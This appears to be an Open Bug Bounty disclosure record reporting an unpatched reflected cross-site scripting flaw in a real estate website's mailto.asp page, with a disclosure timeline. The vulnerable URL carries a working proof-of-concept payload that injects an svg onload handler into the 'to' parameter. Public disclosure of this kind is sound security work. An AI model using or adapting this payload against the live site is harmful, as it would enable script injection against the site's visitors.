ansierealty.co.za XSS vulnerability

2017-10-21T20:39:00
ID OBB:359714
Type openbugbounty
Reporter M0r3h4x
Modified 2018-01-19T21:22:00

Description

Vulnerable URL:
http://www.ansierealty.co.za/mailto.asp?to=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3E&subject;=Ansie%20Realty:%20eMail%20to%20Agent:%20Ansie%20van%20den%20Berg%20-%20GR155&body;=Dear%20Agent%20(Ansie%20van%20den%20Berg)%0D%0A%0D%0AThis%20email%20is%20being%20generated%20at%2029/08/2017%2010:11:28.%20I%20am%20interested%20in%20this%20property%20and%20look%20forward%20to%20you%20contacting%20me%20for%20more%20information%20on%20my%20requirements%20asap.%0D%0A%0D%0ARegards.&propertyreference;=GR155
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 19.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 16028145
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 October, 2017 20:39 GMT
Generic security notifications sent to website owner| 21 October, 2017 20:41 GMT
Vulnerability details disclosed by researcher| 19 January, 2018 21:22 GMT